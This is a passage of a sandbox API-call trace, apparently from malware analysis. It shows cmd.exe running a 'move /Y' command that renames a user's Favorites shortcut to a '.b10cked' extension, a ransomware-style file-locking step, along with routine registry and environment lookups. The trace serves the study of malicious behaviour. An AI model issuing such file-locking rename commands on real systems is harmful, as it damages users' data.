State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0213.774] GetConsoleOutputCP () returned 0x1b5 [0213.775] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0213.775] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0213.775] _get_osfhandle (_FileHandle=1) returned 0x7 [0213.775] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0213.775] _get_osfhandle (_FileHandle=1) returned 0x7 [0213.775] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0213.775] _get_osfhandle (_FileHandle=1) returned 0x7 [0213.775] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0213.775] _get_osfhandle (_FileHandle=0) returned 0x3 [0213.775] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0213.776] _get_osfhandle (_FileHandle=0) returned 0x3 [0213.776] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0213.776] GetEnvironmentStringsW () returned 0x320198* [0213.776] FreeEnvironmentStringsW (penv=0x320198) returned 1 [0213.776] GetEnvironmentStringsW () returned 0x320198* [0213.776] FreeEnvironmentStringsW (penv=0x320198) returned 1 [0213.776] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ae72c | out: phkResult=0x1ae72c*=0x40) returned 0x0 [0213.776] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ae734, lpData=0x1ae738, lpcbData=0x1ae730*=0x1000 | out: lpType=0x1ae734*=0x0, lpData=0x1ae738*=0xc0, lpcbData=0x1ae730*=0x1000) returned 0x2 [0213.777] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ae734, lpData=0x1ae738, lpcbData=0x1ae730*=0x1000 | out: lpType=0x1ae734*=0x4, lpData=0x1ae738*=0x1, lpcbData=0x1ae730*=0x4) returned 0x0 [0213.777] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, 
lpType=0x1ae734, lpData=0x1ae738, lpcbData=0x1ae730*=0x1000 | out: lpType=0x1ae734*=0x0, lpData=0x1ae738*=0x1, lpcbData=0x1ae730*=0x1000) returned 0x2 [0213.777] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ae734, lpData=0x1ae738, lpcbData=0x1ae730*=0x1000 | out: lpType=0x1ae734*=0x4, lpData=0x1ae738*=0x0, lpcbData=0x1ae730*=0x4) returned 0x0 [0213.777] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ae734, lpData=0x1ae738, lpcbData=0x1ae730*=0x1000 | out: lpType=0x1ae734*=0x4, lpData=0x1ae738*=0x40, lpcbData=0x1ae730*=0x4) returned 0x0 [0213.777] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ae734, lpData=0x1ae738, lpcbData=0x1ae730*=0x1000 | out: lpType=0x1ae734*=0x4, lpData=0x1ae738*=0x40, lpcbData=0x1ae730*=0x4) returned 0x0 [0213.777] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ae734, lpData=0x1ae738, lpcbData=0x1ae730*=0x1000 | out: lpType=0x1ae734*=0x0, lpData=0x1ae738*=0x40, lpcbData=0x1ae730*=0x1000) returned 0x2 [0213.777] RegCloseKey (hKey=0x40) returned 0x0 [0213.777] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ae72c | out: phkResult=0x1ae72c*=0x40) returned 0x0 [0213.777] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ae734, lpData=0x1ae738, lpcbData=0x1ae730*=0x1000 | out: lpType=0x1ae734*=0x0, lpData=0x1ae738*=0x40, lpcbData=0x1ae730*=0x1000) returned 0x2 [0213.777] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ae734, lpData=0x1ae738, lpcbData=0x1ae730*=0x1000 | out: lpType=0x1ae734*=0x4, lpData=0x1ae738*=0x1, lpcbData=0x1ae730*=0x4) returned 0x0 [0213.777] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ae734, lpData=0x1ae738, lpcbData=0x1ae730*=0x1000 | out: 
lpType=0x1ae734*=0x0, lpData=0x1ae738*=0x1, lpcbData=0x1ae730*=0x1000) returned 0x2 [0213.777] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ae734, lpData=0x1ae738, lpcbData=0x1ae730*=0x1000 | out: lpType=0x1ae734*=0x4, lpData=0x1ae738*=0x0, lpcbData=0x1ae730*=0x4) returned 0x0 [0213.777] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ae734, lpData=0x1ae738, lpcbData=0x1ae730*=0x1000 | out: lpType=0x1ae734*=0x4, lpData=0x1ae738*=0x9, lpcbData=0x1ae730*=0x4) returned 0x0 [0213.777] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ae734, lpData=0x1ae738, lpcbData=0x1ae730*=0x1000 | out: lpType=0x1ae734*=0x4, lpData=0x1ae738*=0x9, lpcbData=0x1ae730*=0x4) returned 0x0 [0213.777] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ae734, lpData=0x1ae738, lpcbData=0x1ae730*=0x1000 | out: lpType=0x1ae734*=0x0, lpData=0x1ae738*=0x9, lpcbData=0x1ae730*=0x1000) returned 0x2 [0213.777] RegCloseKey (hKey=0x40) returned 0x0 [0213.777] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863af [0213.777] srand (_Seed=0x5b8863af) [0213.777] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNAUT~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Autos.url.b10cked\"" [0213.777] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNAUT~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Autos.url.b10cked\"" [0213.778] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0213.778] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3218f8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0213.778] GetEnvironmentVariableW (in: lpName="PATH", 
lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0213.778] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0213.778] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0213.778] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0213.778] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0213.778] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0213.778] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0213.778] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0213.778] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0213.778] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0213.778] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0213.779] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0213.779] GetEnvironmentStringsW () returned 0x3222e8* [0213.779] FreeEnvironmentStringsW (penv=0x3222e8) returned 1 [0213.779] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0213.779] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0213.779] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0213.779] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0213.779] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0213.779] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0213.779] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0213.779] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0213.779] _wcsicmp (_String1="KEYS", 
_String2="RANDOM") returned -7 [0213.779] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0213.779] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1af4f8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0213.779] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1af4f8, lpFilePart=0x1af4f4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1af4f4*="Desktop") returned 0x18 [0213.779] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0213.779] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1af274 | out: lpFindFileData=0x1af274) returned 0x320028 [0213.780] FindClose (in: hFindFile=0x320028 | out: hFindFile=0x320028) returned 1 [0213.780] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1af274 | out: lpFindFileData=0x1af274) returned 0x320028 [0213.780] FindClose (in: hFindFile=0x320028 | out: hFindFile=0x320028) returned 1 [0213.780] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1af274 | out: lpFindFileData=0x1af274) returned 0x320028 [0213.780] FindClose (in: hFindFile=0x320028 | out: hFindFile=0x320028) returned 1 [0213.780] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0213.780] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0213.780] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0213.780] GetEnvironmentStringsW () returned 0x322b08* [0213.781] FreeEnvironmentStringsW (penv=0x322b08) returned 1 [0213.781] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0213.781] GetConsoleOutputCP () returned 0x1b5 [0213.781] GetCPInfo (in: CodePage=0x1b5, 
lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0213.781] GetUserDefaultLCID () returned 0x409 [0213.782] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0213.782] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1af638, cchData=128 | out: lpLCData="0") returned 2 [0213.782] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1af638, cchData=128 | out: lpLCData="0") returned 2 [0213.782] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1af638, cchData=128 | out: lpLCData="1") returned 2 [0213.782] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0213.782] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0213.782] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0213.782] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0213.782] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0213.782] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0213.782] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0213.782] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0213.782] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0213.782] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0213.783] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0213.784] GetConsoleTitleW (in: lpConsoleTitle=0x3108f0, nSize=0x104 | out: 
lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0213.784] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0213.784] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0213.784] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0213.784] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0213.785] _wcsicmp (_String1="move", _String2=")") returned 68 [0213.785] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0213.785] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0213.785] _wcsicmp (_String1="IF", _String2="move") returned -4 [0213.785] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0213.785] _wcsicmp (_String1="REM", _String2="move") returned 5 [0213.785] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0213.789] GetConsoleTitleW (in: lpConsoleTitle=0x1af330, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0214.049] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0214.050] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0214.050] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0214.050] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0214.050] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0214.050] _wcsicmp (_String1="move", _String2="CD") returned 10 [0214.050] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0214.050] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0214.050] _wcsicmp (_String1="move", _String2="REN") returned -5 [0214.050] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0214.050] _wcsicmp (_String1="move", _String2="SET") returned -6 [0214.050] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0214.050] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0214.050] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0214.050] _wcsicmp 
(_String1="move", _String2="PROMPT") returned -3 [0214.050] _wcsicmp (_String1="move", _String2="MD") returned 11 [0214.050] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0214.050] _wcsicmp (_String1="move", _String2="RD") returned -5 [0214.050] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0214.050] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0214.050] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0214.050] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0214.050] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0214.050] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0214.050] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0214.050] _wcsicmp (_String1="move", _String2="VER") returned -9 [0214.050] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0214.050] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0214.050] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0214.050] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0214.050] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0214.050] _wcsicmp (_String1="move", _String2="START") returned -6 [0214.050] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0214.050] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0214.050] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0214.052] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0214.052] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0214.052] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1af0ec, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1af0e4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1af0e4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0214.052] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", 
_MaxCount=0x7) returned 38 [0214.052] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0214.052] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0214.052] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0214.052] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0214.052] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0214.053] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0214.053] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0214.053] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0214.053] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0214.053] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0214.053] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0214.053] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0214.053] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0214.053] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0214.053] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0214.053] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0214.053] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0214.053] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0214.053] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0214.053] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0214.053] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0214.053] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 
[0214.053] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0214.053] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0214.053] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0214.053] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0214.053] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0214.053] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0214.053] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0214.053] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0214.053] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0214.054] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0214.054] _wcsicmp (_String1="MSNAUT~1.URL", _String2=".") returned 63 [0214.054] _wcsicmp (_String1="MSNAUT~1.URL", _String2="..") returned 63 [0214.054] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNAUT~1.URL" (normalized: "c:\\users\\default\\favori~1\\msnweb~1\\msnaut~1.url")) returned 0x20 [0214.054] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x321e68 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0214.054] SetErrorMode (uMode=0x0) returned 0x0 [0214.054] SetErrorMode (uMode=0x1) returned 0x0 [0214.054] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNAUT~1.URL", nBufferLength=0x104, lpBuffer=0x1aea74, lpFilePart=0x1aea5c | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNAUT~1.URL", lpFilePart=0x1aea5c*="MSNAUT~1.URL") returned 0x2f [0214.054] SetErrorMode (uMode=0x0) returned 0x1 [0214.055] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1" (normalized: "c:\\users\\default\\favori~1\\msnweb~1")) returned 0x10 [0214.055] _wcsicmp (_String1="MSNAUT~1.URL", _String2=".") 
returned 63 [0214.055] _wcsicmp (_String1="MSNAUT~1.URL", _String2="..") returned 63 [0214.055] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNAUT~1.URL" (normalized: "c:\\users\\default\\favori~1\\msnweb~1\\msnaut~1.url")) returned 0x20 [0214.055] SetErrorMode (uMode=0x0) returned 0x0 [0214.055] SetErrorMode (uMode=0x1) returned 0x0 [0214.055] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNAUT~1.URL", nBufferLength=0x104, lpBuffer=0x1aeef0, lpFilePart=0x1aec88 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNAUT~1.URL", lpFilePart=0x1aec88*="MSNAUT~1.URL") returned 0x2f [0214.055] SetErrorMode (uMode=0x0) returned 0x1 [0214.055] SetErrorMode (uMode=0x0) returned 0x0 [0214.055] SetErrorMode (uMode=0x1) returned 0x0 [0214.055] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Autos.url.b10cked", nBufferLength=0x104, lpBuffer=0x1af0f8, lpFilePart=0x1aec88 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Autos.url.b10cked", lpFilePart=0x1aec88*="MSN Autos.url.b10cked") returned 0x38 [0214.055] SetErrorMode (uMode=0x0) returned 0x1 [0214.055] SetLastError (dwErrCode=0x0) [0214.055] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Autos.url.b10cked" (normalized: "c:\\users\\default\\favori~1\\msnweb~1\\msn autos.url.b10cked")) returned 0xffffffff [0214.055] GetLastError () returned 0x2 [0214.055] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNAUT~1.URL", fInfoLevelId=0x1, lpFindFileData=0x1ae604, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ae604) returned 0x310eb0 [0214.056] FindNextFileW (in: hFindFile=0x310eb0, lpFindFileData=0x1ae604 | out: lpFindFileData=0x1ae604) returned 0 [0214.056] GetLastError () returned 0x12 [0214.056] FindClose (in: hFindFile=0x310eb0 | out: hFindFile=0x310eb0) returned 1 [0214.057] FindFirstFileExW (in: 
lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNAUT~1.URL", fInfoLevelId=0x1, lpFindFileData=0x321c08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x321c08) returned 0x310eb0 [0214.057] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Autos.url.b10cked", nBufferLength=0x104, lpBuffer=0x1ae89c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Autos.url.b10cked", lpFilePart=0x0) returned 0x38 [0214.057] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Autos.url", nBufferLength=0x104, lpBuffer=0x1ae89c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Autos.url", lpFilePart=0x0) returned 0x30 [0214.057] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Autos.url" (normalized: "c:\\users\\default\\favori~1\\msnweb~1\\msn autos.url")) returned 0x20 [0214.057] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Autos.url" (normalized: "c:\\users\\default\\favori~1\\msnweb~1\\msn autos.url"), lpNewFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Autos.url.b10cked" (normalized: "c:\\users\\default\\favori~1\\msnweb~1\\msn autos.url.b10cked"), dwFlags=0x3) returned 1 [0214.058] FindClose (in: hFindFile=0x310eb0 | out: hFindFile=0x310eb0) returned 1 [0214.058] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x1ae850 | out: _Buffer=" 1") returned 9 [0214.058] _get_osfhandle (_FileHandle=1) returned 0x7 [0214.058] GetFileType (hFile=0x7) returned 0x2 [0214.058] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0214.058] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ae7dc | out: lpMode=0x1ae7dc) returned 1 [0214.058] _get_osfhandle (_FileHandle=1) returned 0x7 [0214.058] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ae810 | out: lpConsoleScreenBufferInfo=0x1ae810) returned 1 [0214.059] FormatMessageW 
(in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0214.059] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x1ae850 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0214.059] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x1ae834, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1ae834*=0x1a) returned 1 [0214.059] _get_osfhandle (_FileHandle=1) returned 0x7 [0214.059] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0214.059] _get_osfhandle (_FileHandle=1) returned 0x7 [0214.059] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0214.060] _get_osfhandle (_FileHandle=0) returned 0x3 [0214.060] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0214.060] SetConsoleInputExeNameW () returned 0x1 [0214.060] GetConsoleOutputCP () returned 0x1b5 [0214.060] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0214.060] SetThreadUILanguage (LangId=0x0) returned 0x409 [0214.060] exit (_Code=0) Process: id = "529" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16840" os_pid = 